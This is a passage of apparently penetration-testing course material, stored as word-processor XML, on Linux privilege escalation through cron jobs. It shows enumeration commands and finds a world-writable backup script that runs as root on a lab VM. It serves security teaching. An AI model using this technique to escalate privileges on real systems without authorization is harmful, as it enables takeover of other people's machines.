        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId884">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cron</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Scheduled tasks are listed under the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directories, where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents the frequency at which the task will run. For example, tasks that will be run daily can be found under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.daily</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each script is listed in its own subdirectory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3627900" cy="4086467"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="374" name="image363.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image363.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId885"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3627900" cy="4086467"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /etc/cron*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing the directory contents, we notice several tasks scheduled to run daily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is worth noting that system administrators often add their own scheduled tasks in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. These tasks should be inspected carefully for insecure file permissions, since most jobs in this file will run as root. To view the current user's scheduled jobs, we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4157663" cy="3766485"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="394" name="image382.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image382.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId886"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4157663" cy="3766485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1458"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the above output, only the commented instructions are present, meaning no cron job has been configured for the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, if we try to run the same command with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> prefix, we discover that a backup script is scheduled to run every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="259" name="image252.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image252.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId887"/>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2AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing cron jobs using sudo reveals jobs run by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. In this example, it shows a backup script running as root. If this file has weak permissions, we may be able to leverage it to escalate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we'll learn later in this Module, the joe user has been granted specific sudo permission only to list cron jobs running as the root user. This permission alone cannot be abused to obtain a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i62olp4aoffr" w:id="374"/>
      <w:bookmarkEnd w:id="374"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking Cron Log files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (18.3.1. Abusing Cron Jobs) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB4">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's focus on another family of privilege escalation techniques and learn how to leverage insecure file permissions. For this section, we will assume that we have already gained access to our Linux target machine as an unprivileged user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To leverage insecure file permissions, we must locate an executable file that not only allows us write access, but also runs at an elevated privilege level. On a Linux system, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId888">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId889">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cron</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> time-based job scheduler is a prime target, since system-level scheduled jobs are executed with root user privileges and system administrators often create scripts for cron jobs with insecure permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this example, we will SSH into the VM 1 as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, providing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a password. In a previous section, we demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for running cron jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId890"/>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2AB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep "CRON" /var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABA">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It appears that a script called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_backups.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/joe/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed in the context of the root user. Judging by the timestamps, it seems that this job runs once every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we know the location of the script, we can inspect its contents and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1778000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89" name="image87.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image87.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId891"/>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2ABD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABE">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script itself is fairly straight-forward: it simply copies the user's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subdirectory. The</w:t>
      </w:r>
      <w:hyperlink r:id="rId892">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId893">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">permissions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the script reveal that every local user can write to the file.</w:t>
      </w:r>
    </w:p>
